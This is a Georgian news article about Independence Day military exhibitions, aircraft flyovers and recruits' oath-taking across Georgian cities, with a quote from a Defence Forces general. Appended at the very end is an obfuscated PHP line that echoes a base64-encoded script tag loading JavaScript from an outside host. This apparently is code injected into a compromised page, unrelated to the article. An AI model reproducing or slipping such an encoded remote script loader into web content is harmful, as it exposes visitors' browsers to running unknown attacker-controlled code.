celsiusi
ავერსი საქკაბელი
საქართველოს დამოუკიდებლობის დღესთან დაკავშირებით, ქვეყნის მასშტაბით სხვადასხვა ქალაქში თავდაცვის ძალების შეიარაღებისა და ჯავშანტექნიკის გამოფენები ეწყობა. მთელი დღის განმავლობაში თბილისის, გორის, ახალციხის, მცხეთის, რუსთავის, ქუთაისის, ზუგდიდის, ბათუმისა და თელავის ცენტრალურ მოედნებზე მოსახლეობას საქართველოში წარმოებული დელტას მიერ დამზადებული ტექნიკის გაცნობა და ფოტოების გადაღება შეუძლია.
 
მოედნებზე გამოფენილია ასევე თავდაცვის ძალებში არსებული სხვა ქვეყნების მიერ წარმოებული სამხედრო ტექნიკა და შეიარაღება. მოქალაქეებს რადიაციული, ქიმიური და ბიოლოგიური დაცვის ასეულის აღჭურვილობის გაცნობის საშუალებაც აქვს.
 
26 მაისს საქართველოს მოდერნიზებული და განახლებული ავიაციაც მიულოცავს, დღეს დედაქალაქის ცაზე თბილავიამშენისა და დელტას ერთობლივი ძალისხმევით ქართველი სპეციალისტების მიერ სრულად მოდერნიზებული სუ 25 ის მოიერიშე თვითმფრინავები და მი 24 ის ტიპის შვეულმფრენები გადაიფრენენ. ავიაცია წითელი და თეთრი ბოლის გამოშვებით მოსახლეობას დამოუკიდებლობის დღეს მიულოცავს, წლევანდელი 26 მაისის კონცეფციიდან გამომდინარე კი "საქართველო ევროპისკენ" იროკეზის ტიპის შვეულმფრენები ცაზე საქართველოს და ევროკავშირის დროშებს გაშლიან.
 
"ფიცს დადებს რეკრუტთა შემადგენლობა. ასევე, საქართველოს დიდ ქალაქებში ტექნიკისა და შეიარაღების გამოფენა, იქნება საავიაციო კომპონენტის სადემონსტრაციო ჩვენება და ასევე 5 ლოკაციაზე თბილისის გარდა იქნება სამხედრო ფიცის დადება, სადაც ფიცის დადების შემდეგ გახდებიან სრულფასოვანი წევრები თავდაცვის ძალების. მინდა ვუსურვო მათ წარმატება სამშობლოს სამსახურში," - აცხადებს ბრიგადის გენერალი, თავდაცვის ძალების მეთაურის მოადგილე, გენერალური შტაბის უფროსი ჯონი ტატუნაშვილი.
 
 
540
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");